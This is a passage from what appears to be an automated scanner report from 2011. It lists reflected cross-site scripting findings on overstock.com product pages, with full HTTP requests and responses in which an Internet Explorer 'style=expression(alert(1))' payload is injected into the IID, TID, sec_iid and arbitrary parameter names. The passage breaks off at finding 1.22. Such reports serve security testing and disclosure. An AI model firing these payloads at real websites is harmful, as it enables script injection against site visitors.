Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:37 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:37 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 138051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="iid" value="prod3348501c4c24"style="x:expression(alert(1))"b33d8b94b5e"/>
...[SNIP]...

1.14. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5005f"style%3d"x%3aexpression(alert(1))"cbd6baea17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5005f"style="x:expression(alert(1))"cbd6baea17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501&sec_iid=74074&5005f"style%3d"x%3aexpression(alert(1))"cbd6baea17=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:41:20 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:41:21 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:21 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:41:21 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 138126

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="5005f"style="x:expression(alert(1))"cbd6baea17" value="1"/>
...[SNIP]...

1.15. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html [sec_iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The value of the sec_iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eedf"style%3d"x%3aexpression(alert(1))"e8f89ae62d3 was submitted in the sec_iid parameter. This input was echoed as 5eedf"style="x:expression(alert(1))"e8f89ae62d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501&sec_iid=740745eedf"style%3d"x%3aexpression(alert(1))"e8f89ae62d3 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:40:34 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:40:34 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:34 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:40:34 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 138051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="sec_iid" value="740745eedf"style="x:expression(alert(1))"e8f89ae62d3"/>
...[SNIP]...

1.16. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [IID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The value of the IID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bf27"style%3d"x%3aexpression(alert(1))"d0bccdeca0f was submitted in the IID parameter. This input was echoed as 9bf27"style="x:expression(alert(1))"d0bccdeca0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?IID=prod38674849bf27"style%3d"x%3aexpression(alert(1))"d0bccdeca0f&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:37:52 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:37:52 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:37:52 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:37:52 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135187

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="iid" value="prod38674849bf27"style="x:expression(alert(1))"d0bccdeca0f"/>
...[SNIP]...

1.17. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [TID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The value of the TID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2647d"style%3d"x%3aexpression(alert(1))"a848c9e5e4d was submitted in the TID parameter. This input was echoed as 2647d"style="x:expression(alert(1))"a848c9e5e4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?TID=R:A2_22647d"style%3d"x%3aexpression(alert(1))"a848c9e5e4d HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:37:13 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:37:13 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:37:13 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:37:13 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 134926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="tid" value="R:A2_22647d"style="x:expression(alert(1))"a848c9e5e4d"/>
...[SNIP]...

1.18. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1845b"style%3d"x%3aexpression(alert(1))"ffbef975427 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1845b"style="x:expression(alert(1))"ffbef975427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?1845b"style%3d"x%3aexpression(alert(1))"ffbef975427=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:38:40 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:38:40 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:40 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:40 GMT; Path=/
Keep-Alive: timeout=5, max=79
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135065

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="1845b"style="x:expression(alert(1))"ffbef975427" value="1"/>
...[SNIP]...

1.19. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html [sec_iid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The value of the sec_iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcd73"style%3d"x%3aexpression(alert(1))"e53b8b1b84 was submitted in the sec_iid parameter. This input was echoed as bcd73"style="x:expression(alert(1))"e53b8b1b84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?IID=prod3867484&sec_iid=74074bcd73"style%3d"x%3aexpression(alert(1))"e53b8b1b84 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:11 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:11 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:11 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:11 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135184

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="sec_iid" value="74074bcd73"style="x:expression(alert(1))"e53b8b1b84"/>
...[SNIP]...

1.20. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html [TID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The value of the TID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa588"style%3d"x%3aexpression(alert(1))"7f727c19a5d was submitted in the TID parameter. This input was echoed as fa588"style="x:expression(alert(1))"7f727c19a5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html?TID=R:A2_3fa588"style%3d"x%3aexpression(alert(1))"7f727c19a5d HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:38:43 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:38:43 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:43 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:38:43 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130331

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="tid" value="R:A2_3fa588"style="x:expression(alert(1))"7f727c19a5d"/>
...[SNIP]...

1.21. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12bf"style%3d"x%3aexpression(alert(1))"0c8da3a38e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f12bf"style="x:expression(alert(1))"0c8da3a38e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html?TID=R:A2_3&f12bf"style%3d"x%3aexpression(alert(1))"0c8da3a38e1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:39:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:39:47 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:47 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:39:47 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<input type="hidden" name="f12bf"style="x:expression(alert(1))"0c8da3a38e1" value="1"/>
...[SNIP]...

1.22. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html [TID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

Issue detail

